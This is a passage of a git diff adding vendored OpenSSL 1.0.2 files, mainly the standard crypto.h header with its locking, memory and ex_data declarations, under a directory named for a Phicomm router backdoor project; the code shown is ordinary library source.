+$ __HERE = F$EDIT(__HERE,"UPCASE")
+$ __TOP = __HERE - "CRYPTO]"
+$ __INCLUDE = __TOP + "INCLUDE.OPENSSL]"
+$!
+$! Set up the logical name OPENSSL to point at the include directory
+$!
+$ DEFINE OPENSSL/NOLOG '__INCLUDE'
+$!
+$! Done
+$!
+$ RETURN
+$!
+$ CLEANUP:
+$!
+$! Restore the logical name OPENSSL if it had a value
+$!
+$ IF __SAVE_OPENSSL .EQS. ""
+$ THEN
+$   DEASSIGN OPENSSL
+$ ELSE
+$   DEFINE/NOLOG OPENSSL '__SAVE_OPENSSL'
+$ ENDIF
+$!
+$! Done
+$!
+$ RETURN
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/crypto.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/crypto.h
new file mode 100644
index 0000000..c450d7a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/crypto.h
@@ -0,0 +1,661 @@
+/* crypto/crypto.h */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECDH support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#ifndef HEADER_CRYPTO_H
+# define HEADER_CRYPTO_H
+
+# include <stdlib.h>
+
+# include <openssl/e_os2.h>
+
+# ifndef OPENSSL_NO_FP_API
+#  include <stdio.h>
+# endif
+
+# include <openssl/stack.h>
+# include <openssl/safestack.h>
+# include <openssl/opensslv.h>
+# include <openssl/ossl_typ.h>
+
+# ifdef CHARSET_EBCDIC
+#  include <openssl/ebcdic.h>
+# endif
+
+/*
+ * Resolve problems on some operating systems with symbol names that clash
+ * one way or another
+ */
+# include <openssl/symhacks.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Backward compatibility to SSLeay */
+/*
+ * This is more to be used to check the correct DLL is being used in the MS
+ * world.
+ */
+# define SSLEAY_VERSION_NUMBER   OPENSSL_VERSION_NUMBER
+# define SSLEAY_VERSION          0
+/* #define SSLEAY_OPTIONS       1 no longer supported */
+# define SSLEAY_CFLAGS           2
+# define SSLEAY_BUILT_ON         3
+# define SSLEAY_PLATFORM         4
+# define SSLEAY_DIR              5
+
+/* Already declared in ossl_typ.h */
+# if 0
+typedef struct crypto_ex_data_st CRYPTO_EX_DATA;
+/* Called when a new object is created */
+typedef int CRYPTO_EX_new (void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                           int idx, long argl, void *argp);
+/* Called when an object is free()ed */
+typedef void CRYPTO_EX_free (void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                             int idx, long argl, void *argp);
+/* Called when we need to dup an object */
+typedef int CRYPTO_EX_dup (CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from,
+                           void *from_d, int idx, long argl, void *argp);
+# endif
+
+/* A generic structure to pass assorted data in a expandable way */
+typedef struct openssl_item_st {
+    int code;
+    void *value;                /* Not used for flag attributes */
+    size_t value_size;          /* Max size of value for output, length for
+                                 * input */
+    size_t *value_length;       /* Returned length of value for output */
+} OPENSSL_ITEM;
+
+/*
+ * When changing the CRYPTO_LOCK_* list, be sure to maintin the text lock
+ * names in cryptlib.c
+ */
+
+# define CRYPTO_LOCK_ERR                 1
+# define CRYPTO_LOCK_EX_DATA             2
+# define CRYPTO_LOCK_X509                3
+# define CRYPTO_LOCK_X509_INFO           4
+# define CRYPTO_LOCK_X509_PKEY           5
+# define CRYPTO_LOCK_X509_CRL            6
+# define CRYPTO_LOCK_X509_REQ            7
+# define CRYPTO_LOCK_DSA                 8
+# define CRYPTO_LOCK_RSA                 9
+# define CRYPTO_LOCK_EVP_PKEY            10
+# define CRYPTO_LOCK_X509_STORE          11
+# define CRYPTO_LOCK_SSL_CTX             12
+# define CRYPTO_LOCK_SSL_CERT            13
+# define CRYPTO_LOCK_SSL_SESSION         14
+# define CRYPTO_LOCK_SSL_SESS_CERT       15
+# define CRYPTO_LOCK_SSL                 16
+# define CRYPTO_LOCK_SSL_METHOD          17
+# define CRYPTO_LOCK_RAND                18
+# define CRYPTO_LOCK_RAND2               19
+# define CRYPTO_LOCK_MALLOC              20
+# define CRYPTO_LOCK_BIO                 21
+# define CRYPTO_LOCK_GETHOSTBYNAME       22
+# define CRYPTO_LOCK_GETSERVBYNAME       23
+# define CRYPTO_LOCK_READDIR             24
+# define CRYPTO_LOCK_RSA_BLINDING        25
+# define CRYPTO_LOCK_DH                  26
+# define CRYPTO_LOCK_MALLOC2             27
+# define CRYPTO_LOCK_DSO                 28
+# define CRYPTO_LOCK_DYNLOCK             29
+# define CRYPTO_LOCK_ENGINE              30
+# define CRYPTO_LOCK_UI                  31
+# define CRYPTO_LOCK_ECDSA               32
+# define CRYPTO_LOCK_EC                  33
+# define CRYPTO_LOCK_ECDH                34
+# define CRYPTO_LOCK_BN                  35
+# define CRYPTO_LOCK_EC_PRE_COMP         36
+# define CRYPTO_LOCK_STORE               37
+# define CRYPTO_LOCK_COMP                38
+# define CRYPTO_LOCK_FIPS                39
+# define CRYPTO_LOCK_FIPS2               40
+# define CRYPTO_NUM_LOCKS                41
+
+# define CRYPTO_LOCK             1
+# define CRYPTO_UNLOCK           2
+# define CRYPTO_READ             4
+# define CRYPTO_WRITE            8
+
+# ifndef OPENSSL_NO_LOCKING
+#  ifndef CRYPTO_w_lock
+#   define CRYPTO_w_lock(type)     \
+        CRYPTO_lock(CRYPTO_LOCK|CRYPTO_WRITE,type,__FILE__,__LINE__)
+#   define CRYPTO_w_unlock(type)   \
+        CRYPTO_lock(CRYPTO_UNLOCK|CRYPTO_WRITE,type,__FILE__,__LINE__)
+#   define CRYPTO_r_lock(type)     \
+        CRYPTO_lock(CRYPTO_LOCK|CRYPTO_READ,type,__FILE__,__LINE__)
+#   define CRYPTO_r_unlock(type)   \
+        CRYPTO_lock(CRYPTO_UNLOCK|CRYPTO_READ,type,__FILE__,__LINE__)
+#   define CRYPTO_add(addr,amount,type)    \
+        CRYPTO_add_lock(addr,amount,type,__FILE__,__LINE__)
+#  endif
+# else
+#  define CRYPTO_w_lock(a)
+#  define CRYPTO_w_unlock(a)
+#  define CRYPTO_r_lock(a)
+#  define CRYPTO_r_unlock(a)
+#  define CRYPTO_add(a,b,c)       ((*(a))+=(b))
+# endif
+
+/*
+ * Some applications as well as some parts of OpenSSL need to allocate and
+ * deallocate locks in a dynamic fashion.  The following typedef makes this
+ * possible in a type-safe manner.
+ */
+/* struct CRYPTO_dynlock_value has to be defined by the application. */
+typedef struct {
+    int references;
+    struct CRYPTO_dynlock_value *data;
+} CRYPTO_dynlock;
+
+/*
+ * The following can be used to detect memory leaks in the SSLeay library. It
+ * used, it turns on malloc checking
+ */
+
+# define CRYPTO_MEM_CHECK_OFF    0x0/* an enume */
+# define CRYPTO_MEM_CHECK_ON     0x1/* a bit */
+# define CRYPTO_MEM_CHECK_ENABLE 0x2/* a bit */
+# define CRYPTO_MEM_CHECK_DISABLE 0x3/* an enume */
+
+/*
+ * The following are bit values to turn on or off options connected to the
+ * malloc checking functionality
+ */
+
+/* Adds time to the memory checking information */
+# define V_CRYPTO_MDEBUG_TIME    0x1/* a bit */
+/* Adds thread number to the memory checking information */
+# define V_CRYPTO_MDEBUG_THREAD  0x2/* a bit */
+
+# define V_CRYPTO_MDEBUG_ALL (V_CRYPTO_MDEBUG_TIME | V_CRYPTO_MDEBUG_THREAD)
+
+/* predec of the BIO type */
+typedef struct bio_st BIO_dummy;
+
+struct crypto_ex_data_st {
+    STACK_OF(void) *sk;
+    /* gcc is screwing up this data structure :-( */
+    int dummy;
+};
+DECLARE_STACK_OF(void)
+
+/*
+ * This stuff is basically class callback functions The current classes are
+ * SSL_CTX, SSL, SSL_SESSION, and a few more
+ */
+
+typedef struct crypto_ex_data_func_st {
+    long argl;                  /* Arbitary long */
+    void *argp;                 /* Arbitary void * */
+    CRYPTO_EX_new *new_func;
+    CRYPTO_EX_free *free_func;
+    CRYPTO_EX_dup *dup_func;
+} CRYPTO_EX_DATA_FUNCS;
+
+DECLARE_STACK_OF(CRYPTO_EX_DATA_FUNCS)
+
+/*
+ * Per class, we have a STACK of CRYPTO_EX_DATA_FUNCS for each CRYPTO_EX_DATA
+ * entry.
+ */
+
+# define CRYPTO_EX_INDEX_BIO             0
+# define CRYPTO_EX_INDEX_SSL             1
+# define CRYPTO_EX_INDEX_SSL_CTX         2
+# define CRYPTO_EX_INDEX_SSL_SESSION     3
+# define CRYPTO_EX_INDEX_X509_STORE      4
+# define CRYPTO_EX_INDEX_X509_STORE_CTX  5
+# define CRYPTO_EX_INDEX_RSA             6
+# define CRYPTO_EX_INDEX_DSA             7
+# define CRYPTO_EX_INDEX_DH              8
+# define CRYPTO_EX_INDEX_ENGINE          9
+# define CRYPTO_EX_INDEX_X509            10
+# define CRYPTO_EX_INDEX_UI              11
+# define CRYPTO_EX_INDEX_ECDSA           12
+# define CRYPTO_EX_INDEX_ECDH            13
+# define CRYPTO_EX_INDEX_COMP            14
+# define CRYPTO_EX_INDEX_STORE           15
+
+/*
+ * Dynamically assigned indexes start from this value (don't use directly,
+ * use via CRYPTO_ex_data_new_class).
+ */
+# define CRYPTO_EX_INDEX_USER            100
+
+/*
+ * This is the default callbacks, but we can have others as well: this is
+ * needed in Win32 where the application malloc and the library malloc may
+ * not be the same.
+ */
+# define CRYPTO_malloc_init()    CRYPTO_set_mem_functions(\
+        malloc, realloc, free)
+
+# if defined CRYPTO_MDEBUG_ALL || defined CRYPTO_MDEBUG_TIME || defined CRYPTO_MDEBUG_THREAD
+#  ifndef CRYPTO_MDEBUG         /* avoid duplicate #define */
+#   define CRYPTO_MDEBUG
+#  endif
+# endif
+
+/*
+ * Set standard debugging functions (not done by default unless CRYPTO_MDEBUG
+ * is defined)
+ */
+# define CRYPTO_malloc_debug_init()      do {\
+        CRYPTO_set_mem_debug_functions(\
+                CRYPTO_dbg_malloc,\
+                CRYPTO_dbg_realloc,\
+                CRYPTO_dbg_free,\
+                CRYPTO_dbg_set_options,\
+                CRYPTO_dbg_get_options);\
+        } while(0)
+
+int CRYPTO_mem_ctrl(int mode);
+int CRYPTO_is_mem_check_on(void);
+
+/* for applications */
+# define MemCheck_start() CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON)
+# define MemCheck_stop() CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_OFF)
+
+/* for library-internal use */
+# define MemCheck_on()   CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ENABLE)
+# define MemCheck_off()  CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_DISABLE)
+# define is_MemCheck_on() CRYPTO_is_mem_check_on()
+
+# define OPENSSL_malloc(num)     CRYPTO_malloc((int)num,__FILE__,__LINE__)
+# define OPENSSL_strdup(str)     CRYPTO_strdup((str),__FILE__,__LINE__)
+# define OPENSSL_realloc(addr,num) \
+        CRYPTO_realloc((char *)addr,(int)num,__FILE__,__LINE__)
+# define OPENSSL_realloc_clean(addr,old_num,num) \
+        CRYPTO_realloc_clean(addr,old_num,num,__FILE__,__LINE__)
+# define OPENSSL_remalloc(addr,num) \
+        CRYPTO_remalloc((char **)addr,(int)num,__FILE__,__LINE__)
+# define OPENSSL_freeFunc        CRYPTO_free
+# define OPENSSL_free(addr)      CRYPTO_free(addr)
+
+# define OPENSSL_malloc_locked(num) \
+        CRYPTO_malloc_locked((int)num,__FILE__,__LINE__)
+# define OPENSSL_free_locked(addr) CRYPTO_free_locked(addr)
+
+const char *SSLeay_version(int type);
+unsigned long SSLeay(void);
+
+int OPENSSL_issetugid(void);
+
+/* An opaque type representing an implementation of "ex_data" support */
+typedef struct st_CRYPTO_EX_DATA_IMPL CRYPTO_EX_DATA_IMPL;
+/* Return an opaque pointer to the current "ex_data" implementation */
+const CRYPTO_EX_DATA_IMPL *CRYPTO_get_ex_data_implementation(void);
+/* Sets the "ex_data" implementation to be used (if it's not too late) */
+int CRYPTO_set_ex_data_implementation(const CRYPTO_EX_DATA_IMPL *i);
+/* Get a new "ex_data" class, and return the corresponding "class_index" */
+int CRYPTO_ex_data_new_class(void);
+/* Within a given class, get/register a new index */
+int CRYPTO_get_ex_new_index(int class_index, long argl, void *argp,
+                            CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
+                            CRYPTO_EX_free *free_func);
+/*
+ * Initialise/duplicate/free CRYPTO_EX_DATA variables corresponding to a
+ * given class (invokes whatever per-class callbacks are applicable)
+ */
+int CRYPTO_new_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad);
+int CRYPTO_dup_ex_data(int class_index, CRYPTO_EX_DATA *to,
+                       CRYPTO_EX_DATA *from);
+void CRYPTO_free_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad);
+/*
+ * Get/set data in a CRYPTO_EX_DATA variable corresponding to a particular
+ * index (relative to the class type involved)
+ */
+int CRYPTO_set_ex_data(CRYPTO_EX_DATA *ad, int idx, void *val);
+void *CRYPTO_get_ex_data(const CRYPTO_EX_DATA *ad, int idx);
+/*
+ * This function cleans up all "ex_data" state. It mustn't be called under
+ * potential race-conditions.
+ */
+void CRYPTO_cleanup_all_ex_data(void);
+
+int CRYPTO_get_new_lockid(char *name);
+
+int CRYPTO_num_locks(void);     /* return CRYPTO_NUM_LOCKS (shared libs!) */
+void CRYPTO_lock(int mode, int type, const char *file, int line);
+void CRYPTO_set_locking_callback(void (*func) (int mode, int type,
+                                               const char *file, int line));
+void (*CRYPTO_get_locking_callback(void)) (int mode, int type,
+                                           const char *file, int line);
+void CRYPTO_set_add_lock_callback(int (*func)
+                                   (int *num, int mount, int type,
+                                    const char *file, int line));
+int (*CRYPTO_get_add_lock_callback(void)) (int *num, int mount, int type,
+                                           const char *file, int line);
+
+/* Don't use this structure directly. */
+typedef struct crypto_threadid_st {
+    void *ptr;
+    unsigned long val;
+} CRYPTO_THREADID;
+/* Only use CRYPTO_THREADID_set_[numeric|pointer]() within callbacks */
+void CRYPTO_THREADID_set_numeric(CRYPTO_THREADID *id, unsigned long val);
+void CRYPTO_THREADID_set_pointer(CRYPTO_THREADID *id, void *ptr);
+int CRYPTO_THREADID_set_callback(void (*threadid_func) (CRYPTO_THREADID *));
+void (*CRYPTO_THREADID_get_callback(void)) (CRYPTO_THREADID *);
+void CRYPTO_THREADID_current(CRYPTO_THREADID *id);
+int CRYPTO_THREADID_cmp(const CRYPTO_THREADID *a, const CRYPTO_THREADID *b);
+void CRYPTO_THREADID_cpy(CRYPTO_THREADID *dest, const CRYPTO_THREADID *src);
+unsigned long CRYPTO_THREADID_hash(const CRYPTO_THREADID *id);
+# ifndef OPENSSL_NO_DEPRECATED
+void CRYPTO_set_id_callback(unsigned long (*func) (void));
+unsigned long (*CRYPTO_get_id_callback(void)) (void);
+unsigned long CRYPTO_thread_id(void);
+# endif
+
+const char *CRYPTO_get_lock_name(int type);
+int CRYPTO_add_lock(int *pointer, int amount, int type, const char *file,
+                    int line);
+
+int CRYPTO_get_new_dynlockid(void);
+void CRYPTO_destroy_dynlockid(int i);
+struct CRYPTO_dynlock_value *CRYPTO_get_dynlock_value(int i);
+void CRYPTO_set_dynlock_create_callback(struct CRYPTO_dynlock_value
+                                        *(*dyn_create_function) (const char
+                                                                 *file,
+                                                                 int line));
+void CRYPTO_set_dynlock_lock_callback(void (*dyn_lock_function)
+                                       (int mode,
+                                        struct CRYPTO_dynlock_value *l,
+                                        const char *file, int line));
+void CRYPTO_set_dynlock_destroy_callback(void (*dyn_destroy_function)
+                                          (struct CRYPTO_dynlock_value *l,
+                                           const char *file, int line));
+struct CRYPTO_dynlock_value
+*(*CRYPTO_get_dynlock_create_callback(void)) (const char *file, int line);
+void (*CRYPTO_get_dynlock_lock_callback(void)) (int mode,
+                                                struct CRYPTO_dynlock_value
+                                                *l, const char *file,
+                                                int line);
+void (*CRYPTO_get_dynlock_destroy_callback(void)) (struct CRYPTO_dynlock_value
+                                                   *l, const char *file,
+                                                   int line);
+
+/*
+ * CRYPTO_set_mem_functions includes CRYPTO_set_locked_mem_functions -- call
+ * the latter last if you need different functions
+ */
+int CRYPTO_set_mem_functions(void *(*m) (size_t), void *(*r) (void *, size_t),
+                             void (*f) (void *));
+int CRYPTO_set_locked_mem_functions(void *(*m) (size_t),
+                                    void (*free_func) (void *));
+int CRYPTO_set_mem_ex_functions(void *(*m) (size_t, const char *, int),
+                                void *(*r) (void *, size_t, const char *,
+                                            int), void (*f) (void *));
+int CRYPTO_set_locked_mem_ex_functions(void *(*m) (size_t, const char *, int),
+                                       void (*free_func) (void *));
+int CRYPTO_set_mem_debug_functions(void (*m)
+                                    (void *, int, const char *, int, int),
+                                   void (*r) (void *, void *, int,
+                                              const char *, int, int),
+                                   void (*f) (void *, int), void (*so) (long),
+                                   long (*go) (void));
+void CRYPTO_get_mem_functions(void *(**m) (size_t),
+                              void *(**r) (void *, size_t),
+                              void (**f) (void *));
+void CRYPTO_get_locked_mem_functions(void *(**m) (size_t),
+                                     void (**f) (void *));
+void CRYPTO_get_mem_ex_functions(void *(**m) (size_t, const char *, int),
+                                 void *(**r) (void *, size_t, const char *,
+                                              int), void (**f) (void *));
+void CRYPTO_get_locked_mem_ex_functions(void
+                                        *(**m) (size_t, const char *, int),
+                                        void (**f) (void *));
+void CRYPTO_get_mem_debug_functions(void (**m)
+                                     (void *, int, const char *, int, int),
+                                    void (**r) (void *, void *, int,
+                                                const char *, int, int),
+                                    void (**f) (void *, int),
+                                    void (**so) (long), long (**go) (void));
+
+void *CRYPTO_malloc_locked(int num, const char *file, int line);
+void CRYPTO_free_locked(void *ptr);
+void *CRYPTO_malloc(int num, const char *file, int line);
+char *CRYPTO_strdup(const char *str, const char *file, int line);
+void CRYPTO_free(void *ptr);
+void *CRYPTO_realloc(void *addr, int num, const char *file, int line);
+void *CRYPTO_realloc_clean(void *addr, int old_num, int num, const char *file,
+                           int line);
+void *CRYPTO_remalloc(void *addr, int num, const char *file, int line);
+
+void OPENSSL_cleanse(void *ptr, size_t len);
+
+void CRYPTO_set_mem_debug_options(long bits);
+long CRYPTO_get_mem_debug_options(void);
+
+# define CRYPTO_push_info(info) \
+        CRYPTO_push_info_(info, __FILE__, __LINE__);
+int CRYPTO_push_info_(const char *info, const char *file, int line);
+int CRYPTO_pop_info(void);
+int CRYPTO_remove_all_info(void);
+
+/*
+ * Default debugging functions (enabled by CRYPTO_malloc_debug_init() macro;
+ * used as default in CRYPTO_MDEBUG compilations):
+ */
+/*-
+ * The last argument has the following significance:
+ *
+ * 0:   called before the actual memory allocation has taken place
+ * 1:   called after the actual memory allocation has taken place
+ */
+void CRYPTO_dbg_malloc(void *addr, int num, const char *file, int line,
+                       int before_p);
+void CRYPTO_dbg_realloc(void *addr1, void *addr2, int num, const char *file,
+                        int line, int before_p);
+void CRYPTO_dbg_free(void *addr, int before_p);
+/*-
+ * Tell the debugging code about options.  By default, the following values
+ * apply:
+ *
+ * 0:                           Clear all options.
+ * V_CRYPTO_MDEBUG_TIME (1):    Set the "Show Time" option.
+ * V_CRYPTO_MDEBUG_THREAD (2):  Set the "Show Thread Number" option.
+ * V_CRYPTO_MDEBUG_ALL (3):     1 + 2
+ */
+void CRYPTO_dbg_set_options(long bits);
+long CRYPTO_dbg_get_options(void);
+
+# ifndef OPENSSL_NO_FP_API
+void CRYPTO_mem_leaks_fp(FILE *);
+# endif
+void CRYPTO_mem_leaks(struct bio_st *bio);
+/* unsigned long order, char *file, int line, int num_bytes, char *addr */
+typedef void *CRYPTO_MEM_LEAK_CB (unsigned long, const char *, int, int,
+                                  void *);
+void CRYPTO_mem_leaks_cb(CRYPTO_MEM_LEAK_CB *cb);
+
+/* die if we have to */
+void OpenSSLDie(const char *file, int line, const char *assertion);
+# define OPENSSL_assert(e)       (void)((e) ? 0 : (OpenSSLDie(__FILE__, __LINE__, #e),1))
+
+unsigned long *OPENSSL_ia32cap_loc(void);
+# define OPENSSL_ia32cap (*(OPENSSL_ia32cap_loc()))
+int OPENSSL_isservice(void);
+
+int FIPS_mode(void);
+int FIPS_mode_set(int r);
+
+void OPENSSL_init(void);
+
+# define fips_md_init(alg) fips_md_init_ctx(alg, alg)
+
+# ifdef OPENSSL_FIPS
+#  define fips_md_init_ctx(alg, cx) \
+        int alg##_Init(cx##_CTX *c) \
+        { \
+        if (FIPS_mode()) OpenSSLDie(__FILE__, __LINE__, \
+                "Low level API call to digest " #alg " forbidden in FIPS mode!"); \
+        return private_##alg##_Init(c); \
+        } \
+        int private_##alg##_Init(cx##_CTX *c)
+
+#  define fips_cipher_abort(alg) \
+        if (FIPS_mode()) OpenSSLDie(__FILE__, __LINE__, \
+                "Low level API call to cipher " #alg " forbidden in FIPS mode!")
+
+# else
+#  define fips_md_init_ctx(alg, cx) \
+        int alg##_Init(cx##_CTX *c)
+#  define fips_cipher_abort(alg) while(0)
+# endif
+
+/*
+ * CRYPTO_memcmp returns zero iff the |len| bytes at |a| and |b| are equal.
+ * It takes an amount of time dependent on |len|, but independent of the
+ * contents of |a| and |b|. Unlike memcmp, it cannot be used to put elements
+ * into a defined order as the return value when a != b is undefined, other
+ * than to be non-zero.
+ */
+int CRYPTO_memcmp(const void *a, const void *b, size_t len);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_CRYPTO_strings(void);
+
+/* Error codes for the CRYPTO functions. */
+
+/* Function codes. */
+# define CRYPTO_F_CRYPTO_GET_EX_NEW_INDEX                 100
+# define CRYPTO_F_CRYPTO_GET_NEW_DYNLOCKID                103
+# define CRYPTO_F_CRYPTO_GET_NEW_LOCKID                   101
+# define CRYPTO_F_CRYPTO_SET_EX_DATA                      102
+# define CRYPTO_F_DEF_ADD_INDEX                           104
+# define CRYPTO_F_DEF_GET_CLASS                           105
+# define CRYPTO_F_FIPS_MODE_SET                           109
+# define CRYPTO_F_INT_DUP_EX_DATA                         106
+# define CRYPTO_F_INT_FREE_EX_DATA                        107
+# define CRYPTO_F_INT_NEW_EX_DATA                         108
+
+/* Reason codes. */
+# define CRYPTO_R_FIPS_MODE_NOT_SUPPORTED                 101
+# define CRYPTO_R_NO_DYNLOCK_CREATE_CALLBACK              100
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cversion.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cversion.c
new file mode 100644
index 0000000..bfff699
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cversion.c
@@ -0,0 +1,107 @@
+/* crypto/cversion.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
